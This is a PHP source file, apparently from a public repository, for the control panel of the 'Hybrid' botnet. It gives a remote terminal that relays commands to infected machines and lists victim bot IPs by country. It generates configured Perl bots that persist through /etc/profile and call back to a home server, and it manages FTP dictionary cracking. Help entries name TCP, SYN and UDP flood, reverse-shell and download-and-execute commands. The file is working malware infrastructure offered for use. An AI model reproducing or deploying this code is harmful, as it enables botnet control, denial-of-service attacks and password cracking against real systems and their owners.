PageRenderTime 36ms CodeModel.GetById 8ms RepoModel.GetById 1ms app.codeStats 0ms

/php/index.php

https://bitbucket.org/foilo/hybrid-bot-v1-openshift-quickstarter
PHP | 889 lines | 806 code | 52 blank | 31 comment | 123 complexity | 847469e4ab3ad87939b9d59b37c82e69 MD5 | raw file
  1. <?php
  2. require_once("GeoIP/geoip.inc");
  3. $gi = geoip_open("GeoIP/GeoIP.dat",GEOIP_STANDARD);
  4. global $current_ip;
  5. global $current_port; // for e.r.t.e connection
  6. $prot = 1;
  7. /*Login to admin panel*/
  8. $name='8f1892ba664544b32307ec668f23deba'; // md5 , you want to edit this (currently: 1)
  9. /*Password for admin login*/
  10. $pass='8f1892ba664544b32307ec668f23deba'; // md5 , you want to edit this (currently: 1)
  11. if($prot == 1) {
  12. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){
  13. header('WWW-Authenticate: Basic realm="Hybrid Remote Administration Control System"');header('HTTP/1.1 401 Unauthorized');
  14. exit("Admin panel: Access Denied");}}
  15. $POST_MAX_SIZE = ini_get('post_max_size'); // POST request max size
  16. $UP_MAX_SIZE = ini_get('upload_max_filesize'); // upload max size
  17. $DICTIONARY_PATH = "dict/";
  18. $box = $_POST['box'];
  19. /*******************************************************************/
  20. /************YOU HAVE TO EDIT THIS!!!!!!!!**************************/
  21. /*******************************************************************/
  22. $host = "LOCALHOST"; //database host
  23. $login = "DB_USER"; //database user
  24. $password = "DB_PASS"; //password for database
  25. $database = "DB_APP_NAME"; // databse name
  26. $table = "bots"; // will be created automatically
  27. /*******************************************************************/
  28. /********************YOU HAVE TO EDIT THIS!!!***********************/
  29. /*******************************************************************/
  30. function dbconnection($h, $l, $p, $d) {
  31. $conn=mysql_connect($h,$l,$p);
  32. if ($conn===FALSE) {
  33. print('connection failed');
  34. }
  35. $seldb=mysql_select_db($d);
  36. if ($seldb==FALSE){
  37. print('selection failed');
  38. }
  39. }
  40. $table_erte_configuration = "erte_configuration";
  41. $ftp_table = "ftp_table";
  42. $help_table = "help_table";
  43. $help_me = $_POST['help_section'];
  44. dbconnection($host, $login, $password, $database);
  45. $res = mysql_query("SELECT * FROM $table_erte_configuration");
  46. while ($row = mysql_fetch_assoc($res)) {
  47. $current_ip = $row[ip];
  48. $current_port = $row[port];
  49. }
  50. function SendCommand($host, $port, $cmd){ // ripped from blacksun bot xD
  51. $return_buffer = "";
  52. $sock = fsockopen($host,$port,$errno,$errstr);
  53. if (!$sock) {
  54. echo "cant connect to remote server!";
  55. } else {
  56. fputs ($sock,$cmd);
  57. while (!feof($sock))
  58. {
  59. $ans = fgets($sock,999666);
  60. $return_buffer .= (htmlspecialchars($ans));
  61. }
  62. }
  63. fclose ($sock);
  64. return $return_buffer;
  65. } // end of rip
  66. /************************************************************************************
  67. PHP Terminal class, originally by author 'bzrudi', modified by cross
  68. for usage in this web panel
  69. ************************************************************************************/
  70. class phpTerm{
  71. function formatPrompt(){
  72. $user = posix_getlogin();
  73. $host = "x1m";
  74. $_SESSION['prompt'] = posix_getlogin()."~# ";
  75. }
  76. function InitSession(){
  77. session_start();
  78. return true;
  79. }
  80. function initVars()
  81. {
  82. if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset']))
  83. {
  84. $_SESSION['cwd'] = getcwd();
  85. $_SESSION['history'] = array();
  86. $_SESSION['output'] = '';
  87. $_REQUEST['command'] ='';
  88. }
  89. }
  90. function buildCommandHistory()
  91. {
  92. if(!empty($_REQUEST['command']))
  93. {
  94. if(get_magic_quotes_gpc())
  95. {
  96. $_REQUEST['command'] = stripslashes($_REQUEST['command']);
  97. }
  98. // drop old commands from list if exists
  99. if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
  100. {
  101. unset($_SESSION['history'][$i]);
  102. }
  103. array_unshift($_SESSION['history'], $_REQUEST['command']);
  104. // append commmand */
  105. if(($_REQUEST['command']) === "shit"){
  106. $_SESSION['output'] .= "Your Question: "."{$_REQUEST['command']}"."\n";
  107. $_SESSION['output'] .= "{$_SESSION['prompt']}"."no fucking xD"."\n";
  108. }
  109. //$_SESSION['output'] .= "{$_SESSION['prompt']}"."{$_REQUEST['command']}"."\n";
  110. }
  111. }
  112. function buildJavaHistory()
  113. {
  114. // build command history for use in the JavaScript
  115. if (empty($_SESSION['history']))
  116. {
  117. $_SESSION['js_command_hist'] = '""';
  118. }
  119. else
  120. {
  121. $escaped = array_map('addslashes', $_SESSION['history']);
  122. $_SESSION['js_command_hist'] = '"", "' . implode('", "', $escaped) . '"';
  123. }
  124. }
  125. function outputHandle($aliases){
  126. global $current_ip;
  127. global $current_port; // for e.r.t.e connection
  128. chdir($_SESSION['cwd']);
  129. /* Alias expansion. */
  130. $length = strcspn($_REQUEST['command'], " \t");
  131. $token = substr(@$_REQUEST['command'], 0, $length);
  132. if (isset($aliases[$token]))
  133. $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
  134. $bot_command = $_REQUEST['command'];
  135. if($bot_command != ""){
  136. $_SESSION['output'] .= "hybrid~# ".$bot_command."\n";
  137. $encoded = SendCommand($current_ip, $current_port, base64_encode($bot_command));
  138. $_SESSION['output'] .= base64_decode($encoded);
  139. }
  140. }
  141. } // end phpTerm
  142. /************************************************************************************
  143. End of php terminal class
  144. ************************************************************************************/
  145. $terminal=new phpTerm;
  146. if($terminal->InitSession()){
  147. $terminal->initVars();
  148. $terminal->buildCommandHistory();
  149. $terminal->buildJavaHistory();
  150. if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
  151. $terminal->outputHandle($aliases);
  152. }
  153. ?>
  154. <html><head><title>Hybrid Botnet Control System</title>
  155. <style type="text/css">
  156. .style1 {
  157. font-family: Geneva;
  158. font-size: 13px;
  159. color: white;
  160. }
  161. form { margin:0px; padding:0px}
  162. body {
  163. background-image: #000;
  164. background-attachment:fixed;
  165. background-position:center;
  166. background-repeat:repeat;
  167. background-color:black;
  168. color: #555;
  169. margin: 0 0;
  170. text-align: left;
  171. font: normal 0.7em sans-serif,Arial;
  172. }
  173. code {
  174. font: normal 1.1em serif, Arial;
  175. background: url(dark.jpg);
  176. color: #888;
  177. display: block;
  178. padding: 3px 6px;
  179. margin-bottom: 12px;
  180. }
  181. .banner {
  182. font: normal 1.1em serif, Arial;
  183. background: url(images/bg.png);
  184. background-position:center;
  185. background-repeat:repeat;
  186. color: #888;
  187. width: 900px;
  188. text-align: left;
  189. display: block;
  190. padding: 3px 6px;
  191. margin-bottom: 12px;
  192. border:1px;
  193. border-style:solid;
  194. border-color:#383838 ;
  195. }
  196. a{ color:#FFFFFF; text-decoration:none}
  197. a:hover{ text-decoration:underline}
  198. textarea {
  199. border:1px solid #383838;
  200. background:transparent;
  201. color:ghostwhite;
  202. width:800px;
  203. height:auto;
  204. font-size: smaller;
  205. font-family:georgia;
  206. }
  207. </style>
  208. <script type="text/javascript" language="JavaScript">
  209. var current_line = 0;
  210. var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
  211. var last = 0;
  212. function key(e) {
  213. if (!e) var e = window.event;
  214. if (e.keyCode == 38 && current_line < command_hist.length-1) {
  215. command_hist[current_line] = document.shell.command.value;
  216. current_line++;
  217. document.shell.command.value = command_hist[current_line];
  218. }
  219. if (e.keyCode == 40 && current_line > 0) {
  220. command_hist[current_line] = document.shell.command.value;
  221. current_line--;
  222. document.shell.command.value = command_hist[current_line];
  223. }
  224. }
  225. function init() {
  226. document.shell.setAttribute("autocomplete", "off");
  227. document.shell.output.scrollTop = document.shell.output.scrollHeight;
  228. document.shell.command.focus();
  229. }
  230. </script>
  231. </head>
  232. <body bgcolor="#000000" text="#FFFFFF" onload="init()">
  233. <center><div class="banner">
  234. <center><h2><font color="orange" face="georgia">&copy Hybrid Remote Administration Control System</font> </h2></center>
  235. <center>
  236. <a href = "index.php"><span class="style1">[ Terminal ]</span></a>
  237. <a href = "?page=stats"><span class="style1">[ Statistics and Control Panel ]</span></a>
  238. <a href = "?page=config"><span class="style1">[ Hybrid Generator ]</span></a>
  239. <a href = "?page=dict"><span class="style1">[ Dictionary Files ]</span></a>
  240. <a href = "?page=ftpcrack"><span class="style1">[ FTP Cracking Progress ]</span></a>
  241. <a href = "?page=help"><span class="style1">[ Hybrid Help ]</span></a></center>
  242. </div> </center>
  243. <!--
  244. <form name="form1" method="post" action="" enctype="multipart/form-data">
  245. -->
  246. <table style="border:#000000 1px solid; background:url(images/world.png) no-repeat" align="center">
  247. <tr><td style="width:900px;height:350px">
  248. <?php
  249. /**********************************************************************************/
  250. // main page, this time focused on remote terminal
  251. if($_GET['page'] == ""){
  252. ?>
  253. <h4><font color="orange" face="georgia">&raquo; Encrypted Remote Terminal Emulator </font></h4>
  254. <table cellpadding="0" cellspacing="0">
  255. <tr><td colspan='2'>
  256. <form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
  257. <center>
  258. <textarea name="output" readonly="readonly" cols="65" rows="20">
  259. <?php
  260. $lines = substr_count($_SESSION['output'], "\n");
  261. $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
  262. echo rtrim($padding . $_SESSION['output']);
  263. ?>
  264. </textarea>
  265. </center>
  266. <p><?php echo "<font color='orange'><small>".get_current_user()."~# </small></font>"; ?>
  267. <input name="command" type="text" style="border-bottom:#383838 1px solid;border-top:none;border-left:none;border-right:none;background:transparent;color:#fff" onkeyup="key(event)" size="100" tabindex="1">
  268. </p>
  269. </form></td></tr>
  270. <?php
  271. }
  272. /**********************************************************************************/
  273. ?>
  274. <form name="form1" method="post" action="" enctype="multipart/form-data">
  275. <?php
  276. dbconnection($host, $login, $password, $database);
  277. /**********************************************************************************************/
  278. // everything regards help
  279. if($_GET['page'] == "help") {
  280. if($help_me){
  281. $res = mysql_query("SELECT * FROM $help_table");
  282. $total_entries = mysql_num_rows($res);
  283. while ($row = mysql_fetch_assoc($res)) {
  284. $about = $row[about];
  285. $terminal_about = $row[terminal_about];
  286. $stats_about = $row[stats_about];
  287. $hygen_about = $row[hygen_about];
  288. $dict_about = $row[dict_about];
  289. $ftpcrack_about = $row[ftpcrack_about];
  290. $sleep_cmd_help = $row[sleep_cmd_help];
  291. $tcpstorm_cmd_help = $row[tcpstorm_cmd_help];
  292. $synstorm_cmd_help = $row[synstorm_cmd_help];
  293. $udp_cmd_help = $row[udp_cmd_help];
  294. $delbot_cmd_help = $row[delbot_cmd_help];
  295. $revsh_cmd_help = $row[revsh_cmd_help];
  296. $erte_cmd_help = $row[erte_cmd_help];
  297. $ftpcrack_cmd_help = $row[ftpcrack_cmd_help];
  298. $dlexec_cmd_help = $row[dlexec_cmd_help];
  299. }
  300. if($help_me == "about"){
  301. $array_description = explode("\n", $about);
  302. $c = count($array_description, 0);
  303. for($i = 0; $i < $c; $i++){
  304. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  305. }
  306. } else if ($help_me == "terminal_about"){
  307. $array_description = explode("\n", $terminal_about);
  308. $c = count($array_description, 0);
  309. for($i = 0; $i < $c; $i++){
  310. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  311. }
  312. } else if ($help_me == "stats_about"){
  313. $array_description = explode("\n", $stats_about);
  314. $c = count($array_description, 0);
  315. for($i = 0; $i < $c; $i++){
  316. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  317. }
  318. } else if ($help_me == "hygen_about"){
  319. $array_description = explode("\n", $hygen_about);
  320. $c = count($array_description, 0);
  321. for($i = 0; $i < $c; $i++){
  322. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  323. }
  324. } else if ($help_me == "dict_about"){
  325. $array_description = explode("\n", $dict_about);
  326. $c = count($array_description, 0);
  327. for($i = 0; $i < $c; $i++){
  328. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  329. }
  330. } else if ($help_me == "ftpcrack_about"){
  331. $array_description = explode("\n", $ftpcrack_about);
  332. $c = count($array_description, 0);
  333. for($i = 0; $i < $c; $i++){
  334. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  335. }
  336. } else if ($help_me == "sleep_cmd_help"){
  337. $array_description = explode("\n", $sleep_cmd_help);
  338. $c = count($array_description, 0);
  339. for($i = 0; $i < $c; $i++){
  340. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  341. }
  342. } else if ($help_me == "tcpstorm_cmd_help"){
  343. $array_description = explode("\n", $tcpstorm_cmd_help);
  344. $c = count($array_description, 0);
  345. for($i = 0; $i < $c; $i++){
  346. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  347. }
  348. } else if ($help_me == "synstorm_cmd_help"){
  349. $array_description = explode("\n", $synstorm_cmd_help);
  350. $c = count($array_description, 0);
  351. for($i = 0; $i < $c; $i++){
  352. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  353. }
  354. } else if ($help_me == "udp_cmd_help"){
  355. $array_description = explode("\n", $udp_cmd_help);
  356. $c = count($array_description, 0);
  357. for($i = 0; $i < $c; $i++){
  358. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  359. }
  360. } else if ($help_me == "delbot_cmd_help"){
  361. $array_description = explode("\n", $delbot_cmd_help);
  362. $c = count($array_description, 0);
  363. for($i = 0; $i < $c; $i++){
  364. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  365. }
  366. } else if ($help_me == "revsh_cmd_help"){
  367. $array_description = explode("\n", $revsh_cmd_help);
  368. $c = count($array_description, 0);
  369. for($i = 0; $i < $c; $i++){
  370. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  371. }
  372. } else if ($help_me == "erte_cmd_help"){
  373. $array_description = explode("\n", $erte_cmd_help);
  374. $c = count($array_description, 0);
  375. for($i = 0; $i < $c; $i++){
  376. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  377. }
  378. } else if ($help_me == "ftpcrack_cmd_help"){
  379. $array_description = explode("\n", $ftpcrack_cmd_help);
  380. $c = count($array_description, 0);
  381. for($i = 0; $i < $c; $i++){
  382. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  383. }
  384. } else if ($help_me == "dlexec_cmd_help"){
  385. $array_description = explode("\n", $dlexec_cmd_help);
  386. $c = count($array_description, 0);
  387. for($i = 0; $i < $c; $i++){
  388. echo "<font size = '2' face = 'georgia' color = 'white'>".$array_description[$i]."</font><br>";
  389. }
  390. }
  391. }
  392. }
  393. /**********************************************************************************************/
  394. // simple statistics table
  395. if($_GET['page'] == "stats") {
  396. echo "
  397. <center><table style = 'width: 800px; height: 100px;' border = '1'>
  398. <tr><td><center><font color='orange' face='georgia'><b><small>&raquo; Bot IP &laquo;</small></b></font></center></td>
  399. <td><center><font color='orange' face='georgia'><b><small>&raquo; Country &laquo;</small></b></font></center></td>
  400. <td><center><font color='orange' face='georgia'><b><small>&raquo; Current Command &laquo;</small></b></font></center></td>
  401. <td><center><font color='orange' face='georgia'><b><small>&raquo; Bot Name &laquo;</small></b></font></center></td>
  402. <td><center><font color='orange' face='georgia'><b><small>&raquo; Bot Message &laquo;</small></b></font></center></td>
  403. <td><center><font color='orange' face='georgia'><b><small>&raquo; Check &laquo;</small></b></font></center></td>
  404. <td><center><font color='orange' face='georgia'><b><small>&raquo; Action &laquo;</small></b></font></center></td></tr>";
  405. $res = mysql_query("SELECT * FROM $table");
  406. $total_entries = mysql_num_rows($res);
  407. while ($row = mysql_fetch_assoc($res)) {
  408. echo "
  409. <tr><td><center><font color='ghostwhite' face = 'georgia' ><small>".$row[ip]."</small></font></center></td>
  410. <td><center><font color='ghostwhite' face = 'georgia' ><small>".geoip_country_name_by_addr($gi, $row[ip])."</small></font></center></td>
  411. <td><center><font color='ghostwhite' face = 'georgia'><small>".str_replace("!", " ", $row[cmd])."</small></font></center></td>
  412. <td><center><font color='ghostwhite' face = 'georgia'><small>".$row[name]."</small></font></center></td>
  413. <td><center><font color='ghostwhite' face = 'georgia'><small>".str_replace("!", " ", $row[msg])."</small></font></center></td>
  414. <td><center><input type='checkbox' name='box[]' value='".$row[ip]."'></center></td>
  415. <td><center><font color='ghostwhite' face = 'georgia'><small><a href = '?page=".$_GET['page']."&bot=delete&name=".$row[name]."'>Delete</a></small></font></center></td>
  416. </tr>
  417. ";
  418. }
  419. if($_GET['bot'] == "delete"){
  420. $my_ip = htmlspecialchars(addslashes($_GET['name']));
  421. mysql_query("DELETE FROM $table WHERE name = '$my_ip'");
  422. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  423. }
  424. echo "</table></center>";
  425. }
  426. /**********************************************************************************************/
  427. if($_GET['page'] == "config") {
  428. ?>
  429. <h4><font color="orange" face="georgia">&raquo; Hybrid Generator</font></h4>
  430. <table>
  431. <tr>
  432. <td><font color="orange"><small>&raquo; Base Bot Name:</small></font></td>
  433. <td><input type="text" name="bot_name" value="Hybrid" size="50"></td>
  434. </tr><tr>
  435. <td><font color="orange"><small>&raquo; Directory to place bot:</small></font></td>
  436. <td><input type="text" name="bot_dir" value="/usr/local/bin/" size="50"></td>
  437. </tr><tr>
  438. <td><font color="orange"><small>&raquo; Default Sleep Time:</small></font></td>
  439. <td><input type="text" name="def_sleep_time" value="10" size="50"></td>
  440. </tr><tr>
  441. <td><font color="orange"><small>&raquo; Home Server:</small></font></td>
  442. <td><input type="text" name="home_server" value="HTTP_HOST" size="50"></td>
  443. </tr><tr>
  444. <td><font color="orange"><small>&raquo; Home Server Port:</small></font></td>
  445. <td><input type="text" name="home_server_port" value="80" size="50"></td>
  446. </tr><tr>
  447. <td><font color="orange"><small>&raquo; Gate Dir:</small></font></td>
  448. <td><input type="text" name="gate_dir" value="<?php print dirname($_SERVER['PHP_SELF']).'/'; ?>" size="50"></td>
  449. </tr><tr>
  450. <td><font color="orange"><small>&raquo; Gate Script:</small></font></td>
  451. <td><input type="text" name="gate_script" value="getcmd.php" size="50"></td>
  452. </tr><tr>
  453. <td><font color="orange"><small>&raquo; Bot's User Agent:</small></font></td>
  454. <td><input type="text" name="bot_ua" value="Hybrid_v.1.0" size="50"></td>
  455. </tr><tr>
  456. <td><font color="orange"><small>&raquo; Autostart File:</small></font></td>
  457. <td><input type="text" name="autostart_file" value="/etc/profile" size="50"></td>
  458. </tr>
  459. </table>
  460. <?php
  461. }
  462. if($_GET['page'] == "dict") { // $DICTIONARY_PATH
  463. if ($handle = opendir($DICTIONARY_PATH)) {
  464. while (false !== ($file = readdir($handle))) {
  465. $info = pathinfo($file, PATHINFO_EXTENSION);
  466. if ($file != "." && $file != "..") {
  467. $full_path = $DICTIONARY_PATH.$file;
  468. $our_page = $_GET['page'];
  469. echo "&nbsp;&nbsp;&nbsp;&nbsp;<font color='orange' face = 'georgia'><small>[ $file ] | <a href = '?page=".$our_page."&act=delete&path=".$full_path."'>Delete</a></small></font><br>";
  470. if($_GET['act'] == "delete"){
  471. $path = htmlspecialchars(addslashes($_GET['path']));
  472. unlink($path);
  473. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  474. }
  475. }
  476. }
  477. }
  478. }
  479. if($_GET['page'] == "ftpcrack") {
  480. echo "
  481. <center><table style = 'width: 800px; height: 100px;' border = '1'>
  482. <tr><td><center><font color='orange' face='georgia'><b><small>&raquo; Ftp Ip &laquo;</small></b></font></center></td>
  483. <td><center><font color='orange' face='georgia'><b><small>&raquo; Ftp Port &laquo;</small></b></font></center></td>
  484. <td><center><font color='orange' face='georgia'><b><small>&raquo; Dict File &laquo;</small></b></font></center></td>
  485. <td><center><font color='orange' face='georgia'><b><small>&raquo; Result &laquo;</small></b></font></center></td>
  486. <td><center><font color='orange' face='georgia'><b><small>&raquo; Action &laquo;</small></b></font></center></td></tr>";
  487. $res = mysql_query("SELECT * FROM $ftp_table");
  488. $total_entries = mysql_num_rows($res);
  489. while ($row = mysql_fetch_assoc($res)) {
  490. echo "
  491. <tr><td><center><font color='ghostwhite' face = 'georgia' ><small>".$row[ip]."</small></font></center></td>
  492. <td><center><font color='ghostwhite' face = 'georgia'><small>".$row[port]."</small></font></center></td>
  493. <td><center><font color='ghostwhite' face = 'georgia'><small>".basename($row[dict])."</small></font></center></td>
  494. <td><center><font color='ghostwhite' face = 'georgia'><small>".str_replace("!", " ", $row[result])."</small></font></center></td>
  495. <td><center><font color='ghostwhite' face = 'georgia'><small><a href = '?page=".$_GET['page']."&ftp=delete&ip=".$row[ip]."'>Delete</a></small></font></center></td>
  496. </tr>
  497. ";
  498. }
  499. if($_GET['ftp'] == "delete"){
  500. $my_ip = htmlspecialchars(addslashes($_GET['ip']));
  501. mysql_query("DELETE FROM $ftp_table WHERE ip = '$my_ip'");
  502. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  503. }
  504. echo "</table></center>";
  505. }
  506. /**********************************************************************************************/
  507. ?>
  508. </td></font></table>
  509. <!-- -------------------------------------------------------------
  510. Here begins bottom table, with options and buttons and controls :X
  511. -------------------------------------------------------------- -->
  512. <center><div class="banner">
  513. <center><table>
  514. <!--
  515. <form name="form1" method="post" action="" enctype="multipart/form-data">
  516. -->
  517. <?php
  518. if($_GET['page'] == "ftpcrack") {
  519. ?>
  520. <br><tr>
  521. <td><font color="orange"><small>FTP ip:</small></font></td>
  522. <td><input type="text" name="ftp_ip" value="" size="50"></td>
  523. </tr><tr>
  524. <td><font color="orange"><small>FTP port:</small></font></td>
  525. <td><input type="text" name="ftp_port" value="" size="50"></td>
  526. </tr>
  527. <?php
  528. echo "<tr><td><font color='orange'><small>Dictionary File:</small></font></td>";
  529. echo "<td><SELECT name='dict_file' style='width:365px'>
  530. <OPTION value='none' selected>None</OPTION>";
  531. if ($handle = opendir($DICTIONARY_PATH)) {
  532. while (false !== ($file = readdir($handle))) {
  533. $info = pathinfo($file, PATHINFO_EXTENSION);
  534. if ($file != "." && $file != "..") {
  535. $full_path = $DICTIONARY_PATH.$file;
  536. $our_page = $_GET['page'];
  537. echo "<OPTION value='".$full_path."'>".$file."</OPTION>";
  538. }
  539. }
  540. }
  541. echo "</SELECT></td></tr>";
  542. echo "<tr><td></td><td align = 'left'><input type=\"submit\" value=\" Add \" name=\"action\"></td></tr>";
  543. if(!is_null($_POST['action'])){
  544. $ftp_ip = htmlspecialchars(addslashes($_POST['ftp_ip']));
  545. $ftp_port = htmlspecialchars(addslashes($_POST['ftp_port']));
  546. $dict_file = htmlspecialchars(addslashes($_POST['dict_file']));
  547. mysql_query("INSERT INTO $ftp_table (ip, port, dict) VALUES ('$ftp_ip', '$ftp_port', '$dict_file')");
  548. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  549. }
  550. echo "</table><br></center>
  551. <center><font size='1'>&copy www.x1machine.com</font></center>
  552. </div></center>
  553. </body></html>";
  554. exit();
  555. }
  556. $ext = array('.txt');
  557. if($_GET['page'] == "dict") {
  558. echo "
  559. <tr><td align = 'left'><font color='orange'><small>Max Upload Size:</small></font></td><td>".$POST_MAX_SIZE."</td></tr>
  560. <tr><td align = 'left'><font color='orange'><small>Max Post Size:</small></font></td><td>".$UP_MAX_SIZE."</td></tr>
  561. <tr><td align = 'left'><font color='orange'><small>Select new dictionary file:</small></font></td><td><input name='dict_file' type='file' size='50'></td></tr>
  562. <tr><td></td><td align = 'left'><input type=\"submit\" value=\" Upload \" name=\"action\"></td></tr>
  563. ";
  564. if(!is_null($_POST['action'])){
  565. $target_path = basename( $_FILES['dict_file']['name']);
  566. if($target_path != NULL){
  567. if(!in_array(strrchr($target_path,'.'),$ext)) die ("Bad file extension! $target_path");
  568. if(move_uploaded_file($_FILES['dict_file']['tmp_name'], $DICTIONARY_PATH.$target_path)) {
  569. echo "<script>location=\"?page=".$_GET['page']."\";</script>";
  570. } else{
  571. print ("<br>Error uploading dictionary file!<br>");
  572. }
  573. }
  574. }
  575. echo "</table><br></center>
  576. <center><font size='1'>&copy www.x1machine.com</font></center>
  577. </div></center>
  578. </body></html>";
  579. exit();
  580. }
  581. if($_GET['page'] == "config") {
  582. echo "
  583. <br>
  584. <tr><td></td><td><input type='submit' value='Generate New Hybrid Bot' name='generate_new_hybrid_bot'></td></tr>
  585. ";
  586. echo "</table><br></center>
  587. <center><font size='1'>&copy www.x1machine.com</font></center>
  588. </div></center>
  589. </body></html>";
  590. if(!is_null($_POST['generate_new_hybrid_bot'])){
  591. $file = 'bot/test.txt';
  592. $bot_file = "bot/bot.zip";
  593. $search = array('hybrid_user_agent_by_x1machine', // user agent [1]
  594. 'hybrid_wwwfolder_name_by_x1machine', // web gate dir [2]
  595. 'hybrid_hell_gate_by_x1machine', // gate script name [3]
  596. 'hybrid_home_by_x1machine', // home server [4]
  597. 'hybrid_home_port_by_x1machine', // maybe you running web server on non-standard port? [5]
  598. 'hybrid_sleep_time_by_x1machine', // default bot time for staying inactive [6]
  599. 'hybrid_autostart_by_x1machine', // autostart file, in most cases /etc/passwd [7]
  600. 'hybrid_local_dir_by_x1machine', // dir on host machine where to store our bot [8]
  601. 'hybrid_base_name_by_x1machine'); // bot's base name [9]
  602. $bot_name = htmlspecialchars(addslashes($_POST['bot_name'])); //1
  603. $bot_dir = htmlspecialchars(addslashes($_POST['bot_dir'])); //2
  604. $def_sleep_time = htmlspecialchars(addslashes($_POST['def_sleep_time'])); //3
  605. $home_server = htmlspecialchars(addslashes($_POST['home_server'])); //4
  606. $home_server_port = htmlspecialchars(addslashes($_POST['home_server_port'])); //5
  607. $gate_dir = htmlspecialchars(addslashes($_POST['gate_dir'])); //6
  608. $gate_script = htmlspecialchars(addslashes($_POST['gate_script'])); //7
  609. $bot_ua = htmlspecialchars(addslashes($_POST['bot_ua'])); //8
  610. $autostart_file = htmlspecialchars(addslashes($_POST['autostart_file'])); //9
  611. if(!$bot_name || !$bot_dir || !$def_sleep_time || !$home_server ||
  612. !$home_server_port || !$gate_dir || !$gate_script || !$bot_ua ||
  613. !$autostart_file) {
  614. die("<center><h3><font color='red'>All fields must be filled!</font></h3></center>");
  615. }
  616. $replace = array($bot_ua, // [1] $bot_ua
  617. $gate_dir, // [2] $gate_dir
  618. $gate_script, // [3] $gate_script
  619. $home_server, // [4] $home_server
  620. $home_server_port, // [5] $home_server_port
  621. $def_sleep_time, // [6] $def_sleep_time
  622. $autostart_file, // [7] $autostart_file
  623. $bot_dir, // [8] $bot_dir
  624. $bot_name); // [9] $bot_name
  625. $lines = file($file);
  626. $HANDLE = fopen($bot_file, 'w') or die("<center><h3><font color='red'>can't open bot file!</font></h3></center>");
  627. foreach($lines as $line_num => $line) {
  628. $text = str_replace($search, $replace, $line);
  629. fwrite($HANDLE, $text);
  630. // print $text;
  631. }
  632. fclose($HANDLE);
  633. print "<center><h3><font color='oragne'>Bot Created! Download .zip file and change extension to .pl</font></h3></center>";
  634. echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"3; url='http://$home_server/bot/bot.pl'\">";
  635. }
  636. exit();
  637. }
  638. if($_GET['page'] == "help") {
  639. echo "<br>
  640. <tr><td><font color='orange'><small>Select help section:</small></font></td><td>
  641. <SELECT name='help_section' style='width:365px'>";
  642. //$res = mysql_query("SELECT ip FROM $table");
  643. //while ($row = mysql_fetch_assoc($res)) {
  644. print("<OPTION value = 'about' selected>About</OPTION>");
  645. print("<OPTION value = 'sep1' >---------------------------------------------------</OPTION>");
  646. print("<OPTION value = 'terminal_about' >About E.R.T.E.</OPTION>");
  647. print("<OPTION value = 'stats_about' >About Statistics</OPTION>");
  648. print("<OPTION value = 'hygen_about' >About Hybrid Generator</OPTION>");
  649. print("<OPTION value = 'dict_about' >About Dictionary Files</OPTION>");
  650. print("<OPTION value = 'ftpcrack_about' >About Ftp Cracking</OPTION>");
  651. print("<OPTION value = 'sep2' >---------------------------------------------------</OPTION>");
  652. print("<OPTION value = 'sleep_cmd_help' >Sleep Command Help</OPTION>");
  653. print("<OPTION value = 'tcpstorm_cmd_help' >TCP Storm Command Help</OPTION>");
  654. print("<OPTION value = 'synstorm_cmd_help' >SYN Storm Command Help</OPTION>");
  655. print("<OPTION value = 'udp_cmd_help' >UDP Storm Command Help</OPTION>");
  656. print("<OPTION value = 'delbot_cmd_help' >Delete Bot Command Help</OPTION>");
  657. print("<OPTION value = 'revsh_cmd_help' >Reverse Shell Command Help</OPTION>");
  658. print("<OPTION value = 'erte_cmd_help' >E.R.T.E Command Help</OPTION>");
  659. print("<OPTION value = 'ftpcrack_cmd_help' >FTP Crack Command Help</OPTION>");
  660. print("<OPTION value = 'dlexec_cmd_help' >Download &amp; Execute Command Help</OPTION>");
  661. //}
  662. echo "
  663. </SELECT>
  664. </td>
  665. </tr>
  666. <tr><td></td><td><input type='submit' value='Show Help Information' name='show_help'></td></tr>
  667. ";
  668. echo "</table><br></center>
  669. <center><font size='1'>&copy www.x1machine.com</font></center>
  670. </div></center>
  671. </body></html>";
  672. exit();
  673. }
  674. if($_GET['page'] == "") {
  675. $current_ip = ""; $current_port = "";
  676. $res = mysql_query("SELECT * FROM $table_erte_configuration");
  677. while ($row = mysql_fetch_assoc($res)) {
  678. $current_ip = $row[ip];
  679. $current_port = $row[port];
  680. }
  681. echo "
  682. <tr><td><font color='orange'><small>Current Configuration:</small></font></td><td><b>".$current_ip.":".$current_port."</b></td></tr>
  683. ";
  684. echo "<tr>
  685. <td><font color=\"orange\"><small>Bot IP:</small></font></td>
  686. <td>";
  687. echo "<SELECT name=\"botip\" style=\"width:365px\"> ";
